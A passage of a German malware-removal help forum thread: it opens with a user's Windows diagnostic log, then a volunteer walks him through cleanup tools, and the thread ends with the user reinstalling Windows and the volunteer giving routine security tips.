  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_a384c5aabe759ea5\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.178
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_a384c5aabe759ea5\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:03.143
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingcore_31bf3856ad364e35_10.0.10074.1_none_a384c5aabe759ea5\wermgr.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:02.253
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.10074.1_none_f3153036f55ab3f5\werfault.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.

  Date: 2015-07-28 12:41:02.248
  Description: Die Integrität der Datei "\Device\HarddiskVolume2\$Windows.~BT\Updates\Critical\8e08ca47-f6ba-409d-82de-698e324c0004\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.10074.1_none_f3153036f55ab3f5\werfault.exe" kann nicht geprüft werden, da das Signaturzertifikat gesperrt wurde. Erkundigen Sie sich beim Herausgeber, ob eine neue signierte Version des Kernelmoduls verfügbar ist.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz
Prozentuale Nutzung des RAM: 48%
Installierter physikalischer RAM: 8172.83 MB
Verfügbarer physikalischer RAM: 4209.74 MB
Summe virtueller Speicher: 16343.86 MB
Verfügbarer virtueller Speicher: 11928.32 MB

==================== Laufwerke ================================

Drive c: (OS) (Fixed) (Total:1384.15 GB) (Free:109.92 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:13.01 GB) (Free:1.6 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1397.3 GB) (Disk ID: D1339AD3)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=1384.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=13 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================


Deathkid535 12.01.2016 08:27

:hallo:

Mein Name ist Dennis und ich werde dir bei der Bereinigung helfen.

Bitte beachte, dass es ein paar Regeln gibt:
  • Bitte lies meine Posts komplett durch bevor du sie abarbeitest
  • Wenn ein Problem auftauchen sollte, unterbreche deine Arbeit, poste die entstandenen Logs und schildere dieses so genau wie möglich.
  • Bitte kein Crossposting
  • Installiere oder Deinstalliere keine Software ohne Aufforderung
  • Bitte verwende nur die Tools welche hier im Thread erwähnt werden
  • Antworte innerhalb von 24h um eine sinnvolle Bereinigung zu ermöglichen
  • Poste die Logs immer in CODE-Tags (#-Button), zur Not die Logs einfach aufteilen

Sollte ich nicht innerhalb von 48h antworten, schreibe mir eine PM!

Schritt # 1: AttentionUninstaller

Deaktiviere deinen Virenscanner, damit AttentionUninstaller sauber durchläuft!

Bitte lade dir die passende Version von AttentionUninstaller auf deinen Desktop: http://deathkid.trojaner-board.de/to.../icon/icon.png AttentionUninstaller 32-Bit | AttentionUninstaller 64-Bit
  • Starte jetzt AttentionUninstaller
  • Warte, bis das Tool fertig gearbeitet hat.
  • Dein Rechner wird gegebenfalls neustarten.
  • Auf deinem Desktop befindet sich nun eine AttentionUninstallerLog.txt. Poste mir deren Inhalt hier.



Schritt # 2: MBAM

Lade dir, falls nicht schon vorhanden, http://filepony.de/icon/tiny/malware...ti_malware.pngMalwarebytes Anti-Malware herunter, installiere und starte es.
  • Gehe in die Einstellungen, unter Erkennung und Schutz und setze das Hakerl für Suche nach Rootkits
  • Wechsle ins Amaturenbrett und klicke auf Jetzt Scannen
  • Nachdem der Suchlauf abgeschlossen ist, verschiebe alle vorhandenen Funde in die Quarantäne.
  • Nachdem der PC neu gestartet hat, findest du unter dem Punkt Verlauf dein Logfile. Poste mir dieses hier.



Schritt # 3: FRST

Bitte noch ein frisches FRST-Log.



Schritt # 4: Bitte Posten
  • Das Log von MBAM
  • Das frische FRST-Log

EisTeeMC 12.01.2016 12:25

Hier die AttentionUninstallerLog.txt:
Code:

ATTENTION UNINSTALLER by Deathkid
Version 1.2

===========================================================

12.01.2016 08:38:04: Deinstallation gestartet...
12.01.2016 08:38:05: GS Supporter 1.80 wird deinstalliert.
12.01.2016 08:40:08: GS Supporter 1.80 konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:40:08: GS Supporter 1.80 wird deinstalliert.
12.01.2016 08:42:08: GS Supporter 1.80 konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:42:08: GS Supporter 1.80 wird deinstalliert.
12.01.2016 08:42:09: SkypEmoticons wird deinstalliert.
12.01.2016 08:44:09: SkypEmoticons konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:44:09: SkypEmoticons wird deinstalliert.
12.01.2016 08:46:10: SkypEmoticons konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:46:10: SkypEmoticons wird deinstalliert.
12.01.2016 08:48:11: SkypEmoticons konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:48:11: SkypEmoticons wird deinstalliert.
12.01.2016 08:50:11: SkypEmoticons konnte nicht deinstalliert werden. Versuche nochmal...
12.01.2016 08:50:11: SkypEmoticons wird deinstalliert.

------------------------- [EOF] ---------------------------

Es ist ein Problem aufgetretten, ich habe jetzt keine möglichkeit mehr von meinem Computer in das Internet zu kommen. Nach den Scan mit den Anti Maleware Programm würden 6 Trojaner gefunden und nach den Neustart zum entfernen fünktioniert die Verbindung nicht mehr. Bei Google Chrome steht jetzt DNS_PROBE_FINISHED_BAD_CONFIG. In den Netzwerkzenter wird mir aber eine funktionierende Internet Verbingung angezeigt.

Ich bitte um weitere Erklärungen.

Deathkid535 12.01.2016 15:15

Hi,

poste bitte das Log von MBAM, das findest du hier: Malwarebytes Anti-Malware Logfile finden - Anleitungen

Danach bitte ein frisches FRST-Log erstellen.

Als letztes bitte noch ein MiniToolBox-Log bitte:

Downloade dir http://filepony.de/icon/tiny/minitoolbox.pngMiniToolBox auf den Desktop.
  • Öffne das Programm
  • Setze einen Haken bei Select All.
  • Klicke nun auf GO.
  • MiniToolBox erstellt nun eine MTB.txt. Poste mir deren Inhalt bitte hier.

EisTeeMC 12.01.2016 22:01

Ich danke dir wirklich für deine Hilfe :) Ich habe jetzt einfach meine wichtigen Dateien auf eine Externe gezogen und meinen Pc Neu aufgesetzt. Sollte es wieder Probleme geben, werde ich mich wieder Melden ^^

MfG Vadim Sch

Deathkid535 12.01.2016 22:23

Hi,

alles klar. Ich geb dir aber noch meine Abschlusstipps mit, vielleicht nimmst du da ja was mit :)

Dann wären wir hier durch. Deine Logs sind sauber :)

Falls du deine Passwörter nicht regelmäßig änderst - jetzt ist der Zeitpunkt dafür!


Abschließend noch ein paar Tipps von mir:

Schritt # 1: Empfohlene Software

Habe immer ein aktuelles Antivirenprogramm deiner Wahl installiert und aktiviere die automatischen Updates (standardmäßig eingeschaltet).

Ich empfehle:

Verwende nach Möglichkeit nicht den Internet Explorer, da dieser viele Sicherheitslücken enthält. Achte aber darauf, dass er immer up to date bleibt, weil viele Programme diesen zum Anzeigen von Websites benutzen.

Alternativ kannst du verwenden:Dazu sind folgende Add-ons empfehlenswert:

http://i1366.photobucket.com/albums/...psgqd3flcy.pnguBlock Origin (Chrome) --> Blockiert Werbung. Werbung kann sehr nervig sein, aber auch auf schädliche Links verweisen. uBlock ist effizienter als der Konkurrent AdblockPlus.
http://filepony.de/icon/tiny/ghostery_chrome.pngGhostery --> Blockiert Tracker und Cookies, welche dich im Internet nachverfolgen können. Stelle jedoch bei der Installation sicher, dass du Ghostrank nicht zustimmst.

Du kannst auch http://filepony.de/icon/tiny/malware...ti_exploit.pngMalwarebytes Anti-Exploit verwenden, um aktuelle Sicherheitslücken zu stopfen.

Halte immer deine Plug-ins und Software aktuell, vor allem:Du kannst diese komfortabel regelmäßig hiermit überprüfen:

PluginCheck
Filehippo App Manager



Schritt # 2: Tipps um eine Neuinfektion zu vermeiden

Downloade nach Möglichkeit immer direkt von der Herstellerseite oder alternativ von einem sauberen Download-Portal wie FilePony.de. Von Downloadern wie die von Chip, Softonic und Sourceforge raten wir ab: CHIP-Installer - was ist das? - Anleitungen

Auch versuchen sich immer mehr Programme durch Installationsroutinen auf den PC "durchzumogeln". Das klappt ganz gut, weil viele Anwender sich diese nicht genau durchlesen und schnell durchklicken. Manchmal steht auch in den Lizenzvereinbarungen, dass ein Programm, was eigentlich als Freeware angepriesen wird, nur genutzt werden kann, wenn man sich bestimmte Toolbars oder andere Programme mitinstallieren lässt.
Da hilft es nur aufmerksam zu sein.

Ein Tool, welches dich dabei gut unterstützen kann, ist: http://filepony.de/icon/tiny/unchecky.pngUnchecky. Dieses überwacht im Hintergrund Installationsprozesse und hakt automatisch nervige Adwarekomponenten wie Toolbars ab. Falls man etwas übersieht, warnt noch ein Pop-up, bevor man fortfahren kann.

Wir raten von jeglichen Optimizern, Cleanern, SpeedUps und Ähnlichem ab, da diese Softwareprodukte meist keinen Performancegewinn bringen. Du kannst jedoch regelmäßig deinen PC mit der windowsinternen Datenträgerbereinigung behandeln.

Überprüfe regelmäßig (mind. 1x pro Monat) deinen PC mit http://filepony.de/icon/tiny/malware...ti_malware.png Malwarebytes Anti-Malware und http://filepony.de/icon/tiny/eset_online_scanner.pngESET.

Falls du dir unsicher bist, ob ein Download wirklich sauber ist, kannst du immer https://www.virustotal.com/ zurate ziehen.



Schritt # 3: Unterstütze uns!

Wenn du uns mit einer kleinen Spende unterstützen möchtest, so kannst du dies hier tun: http://www.trojaner-board.de/79994-s...ndenkonto.html :party:

Es reicht aber auch schon ein simples :dankeschoen: hier, wenn du mit uns zufrieden warst. :)

http://3.bp.blogspot.com/--h4eLCX9kl...ike-symbol.png unsere Facebook-Seite!

Bitte gib mir bescheid, wenn du das alles gelesen hast und alles klar ist, damit ich dieses Thema aus meinen Abos löschen kann.

EisTeeMC 12.01.2016 22:55

Vielen danke für die weiteren Tipps :) Mein Fehler war sehr Dumm und Eigenverschuldet, in Zukunft werde ich über viele Dinge erstmal ein kritisches Auge werfen.

Kannst den Threat aus deinen Abos löschen und nochmal vielen dank ^^

MfG Vadim Sch

Deathkid535 12.01.2016 22:58

Gerne :)


Alle Zeitangaben in WEZ +1. Es ist jetzt 07:16 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132